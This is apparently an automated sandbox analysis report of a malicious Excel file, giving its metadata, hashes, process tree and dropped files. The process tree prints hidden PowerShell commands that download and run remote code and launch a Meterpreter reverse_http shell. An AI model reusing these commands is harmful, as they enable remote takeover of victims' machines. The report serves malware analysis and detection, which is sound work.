File name: | 85349fef3d4babee2eec284ff6e7756947116a6e484b867d996d3dca0920bd13.xls |
Full analysis: | https://app.any.run/tasks/c77116d1-8f2d-4859-9793-cd8f3aaff9a3 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 01:55:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Itamar Dahan, Last Saved By: Itamar Dahan, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu May 23 14:05:54 2019, Last Saved Time/Date: Thu May 23 14:05:56 2019, Security: 0 |
MD5: | DD035658DDDEF77D73FA81BD1ABE4DA4 |
SHA1: | 6E16FE5511C53B4915A609C3381FD74E398140E9 |
SHA256: | 85349FEF3D4BABEE2EEC284FF6E7756947116A6E484B867D996D3DCA0920BD13 |
SSDEEP: | 768:sP1k3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ6WN1J3csDj4vNo:41k3hbdlylKsgqopeJBWhZFGkE+cL2NC |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:05:23 13:05:56 |
CreateDate: | 2019:05:23 13:05:54 |
Software: | Microsoft Excel |
LastModifiedBy: | Itamar Dahan |
Author: | Itamar Dahan |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2620 | powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('10.110.1.10')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 10.110.1.15 -Lport 8080 -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1584 | wscript C:\Users\Public\config.vbs | C:\Windows\system32\wscript.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2864 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('10.110.1.10')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 10.110.1.15 -Lport 8080 -Force | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1892 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR4019.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1892 | EXCEL.EXE | C:\Users\Public\config.txt | — | |
MD5:— | SHA256:— | |||
2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z6WQFT0U55396GT6A2CN.temp | — | |
MD5:— | SHA256:— | |||
2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JR66TJOFR509WYTN1E6G.temp | — | |
MD5:— | SHA256:— | |||
2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2620 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1349ce.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1892 | EXCEL.EXE | C:\Users\Public\config.vbs | text | |
MD5:EE44198577A8E6A2B6D69A3A1A23D821 | SHA256:7C6405053392E07489DDDB85AAE3A3CAADA0C71393EC474D66D4F89878385C1F | |||
2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134b74.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |